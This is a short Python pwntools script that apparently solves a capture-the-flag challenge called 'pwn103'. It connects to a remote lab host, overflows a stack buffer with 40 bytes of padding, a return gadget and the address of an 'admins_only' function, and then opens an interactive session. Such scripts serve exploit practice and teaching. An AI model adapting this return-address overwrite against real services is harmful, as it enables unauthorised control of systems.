#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./pwn103", checksec=False)
# r = process()
r = remote("10.10.167.194", 9003)

# funcs
s = lambda a: r.sendlineafter(b": ", a)

# buf
s(b"3")
buf = b"A"*40
buf += p64(0x401553)
buf += p64(target.sym.admins_only)
s(buf)

r.interactive()